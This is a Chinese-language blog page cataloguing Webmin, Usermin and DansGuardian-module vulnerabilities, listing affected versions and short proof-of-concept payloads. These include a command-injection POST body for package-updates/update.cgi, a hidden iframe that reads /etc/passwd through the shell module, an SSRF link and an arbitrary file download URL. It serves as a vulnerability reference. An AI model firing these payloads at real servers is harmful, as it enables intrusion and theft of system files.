zoukankan      html  css  js  c++  java

  • 应用安全

    简介

    开发语言
PHP

    用途
    系统管理

     

    CVE-2019-15642

    Date
    2019.7

    类型
    远程代码执行

    影响范围
    Webmin <= 1.920

    复现
    POC|EXP
    OBJECT Socket;print "Content-Type: text/plain

";$cmd='id'; print "$cmd

";
     

    分析

    反序列化导致远程代码执行

    CVE-2019-15107

    Date
2019

类型
远程代码执行
    
影响范围

    Webmin <= 1.920

    前置条件
    /password_change.cgi可访问

    复现
    POC | EXP


    
分析

    CVE-2019-12840

    Date
2019.6

类型
远程代码执行

影响范围
v 1.910

复现
    POC|EXP
    (1)
    POST: https://url/package-updates/update.cgi 
    Data: mode=updates&search=&u=apt/apt&u=;${command};/apt&ok_top=Update+Selected+Packages
    mode=updates&search=&u=apt/apt&u=;echo ”124“ > asd.txt;%2Fapt&ok=Update+Selected+Packages
    (2)
    POST: https://url/package-updates/update.cgi 
    Data: mode=new&search=&u=;${command};/apt&ok_top=Update+Selected+Packages
    

分析

    XSS vulnerability that leads to Remote Code Execution

    Date
2017

类型
XSS导致远程代码执行

影响范围
Webmin version 1.850

    前置条件
    /at/create_job.cgi可访问
     

    CSRF

    Date
2017

类型
CSRF

影响范围
Webmin version 1.850

    SSRF

    Date
2017

类型
SSRF

    影响范围
Webmin version     1.850

    复现
    POC|EXP
    https://xx.org:8443/tunnel/link.cgi/https://baidu.com

    HTML Email Command Execution Vulnerability

    Date

类型
远程命令执行

影响范围
    Usermin versions <= 1.080
    
复现
POC    |EXP
<iframe src='/shell/index.cgi?cmd=cat+%2Fetc%2Fpasswd&pwd=%2Fhome%2Fv
ictim&history=' height=0 width=0></iframe>

    任意文件下载

    Date
2004

类型
任意文件下载

影响范围
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.8
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.6
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.5
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.3
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.2
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.1
    DansGuardian Webmin Module DansGuardian Webmin Module 0.4.2
    DansGuardian Webmin Module DansGuardian Webmin Module 0.4.1
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.7 a
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.7
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.6
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.5 a
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.5
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.4
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.3
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.2
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.1
    DansGuardian Webmin Module DansGuardian Webmin Module 0.2.1
    DansGuardian Webmin Module DansGuardian Webmin Module 0.2 .0
    
前置条件
    /dansguardian/edit.cgi 可访问

复现
POC|EXP
    https://www.xx.com:10000/dansguardian/edit.cgi?file=[FILE]
  • 相关阅读:
    使用Windbg调试.Net应用程序 [转]
    jquery的$.extend和$.fn.extend作用及区别
    java获取ip
    在IDEA中使用MyBatis Generator逆向工程生成代码
    github结合TortoiseGit使用sshkey,无需输入账号和密码
    Mapped Statements collection does not contain value for com.xxxx.dao.impl.AreaDAOImpl.findByCode
    idea设置tomcat虚拟路径的两种方法
    spring MVC中传递的参数对象中包含list的情况
    PowerDsigner 16逆向工程导入mysql
    [C++]Qt文本操作(按行读写)
  • 原文地址:https://www.cnblogs.com/AtesetEnginner/p/12055981.html
Copyright © 2011-2022 走看看